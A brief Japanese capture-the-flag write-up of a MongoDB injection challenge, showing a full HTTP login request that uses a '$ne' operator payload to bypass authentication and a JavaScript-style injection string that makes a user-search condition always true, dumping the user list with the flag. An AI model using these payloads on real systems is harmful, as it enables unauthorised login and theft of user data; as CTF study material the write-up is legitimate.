MongoDB Injectionができるらしいサイトが与えられる。
ソースコードは無い。
ログインページをまずは突破する。
色々試すと、以下のような$neで突破可能。

```
POST /login HTTP/2
Host: cp.uctf.ir
Cookie: ssid=s%3Aa75c57de-ed3c-4eb1-b795-bbc2a9f178dc.qcheCIEffGtOrDN6YbYgLKX4nJ4URy%2FUbBfaYKxrkPA; ba07499ab750e5460403c776a406d8aa=d103ff7eb8dbfa2365a1f545a1eee34f
Content-Length: 49
Content-Type: application/json

{"username":{"$ne": "x"},"password":{"$ne": "x"}}
```

`GET /home`にリダイレクトされるが、ユーザー検索ができる画面が与えられる。
手元のpayloadを適当に試すと、`'; return true; var d='`で条件式を恒真にできてユーザーリストが手に入る。
そこにフラグもあった。

Original writeup (https://blog.hamayanhamayan.com/entry/2023/09/04/232413).